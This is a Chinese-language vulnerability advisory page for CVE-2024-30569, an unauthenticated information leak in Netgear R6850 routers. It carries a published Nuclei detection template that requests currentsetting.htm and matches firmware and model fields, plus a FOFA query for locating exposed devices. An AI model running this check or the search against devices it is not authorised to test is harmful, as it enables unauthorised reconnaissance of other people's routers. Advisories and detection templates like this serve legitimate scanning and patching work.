CVE-2024-30569: Netgear R6850 - Information Disclosure

日期: 2025-08-01 | 影响软件: Netgear R6850 | POC: 已公开

漏洞描述

Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the currentsetting.htm page.This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as firmware version, model details, connection status, and other system configuration data.

PoC代码[已公开]

id: CVE-2024-30569

info:
  name: Netgear R6850 - Information Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the currentsetting.htm page.This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as firmware version, model details, connection status, and other system configuration data.
  remediation: |
    Restrict access to the currentsetting.htm page by implementing proper authentication. Keep router firmware updated to the latest version once a patch is available.
  reference:
    - https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Info%20Leak%20in%20Netgear-R6850%EF%BC%88currentsetting.htm%EF%BC%89.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30569
    - https://www.netgear.com/about/security/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-30569
    cwe-id: CWE-200
    epss-score: 0.26292
    epss-percentile: 0.96131
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="NETGEAR" && "R6850"
  tags: cve,cve2024,netgear,router,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/currentsetting.htm"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Firmware="
          - "LoginMethod="
          - "Model="
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dcdc036a72100820ea8068a6d49b5cb4c5c0d2d2c2950adc0a200f91b55d16ff022100cbf2a77a3251e32e2ef002bbedefa36d0462f8b90f2f167e914a8ba4ef463d68:922c64590222798bb761d5b6d8e72950

相关漏洞推荐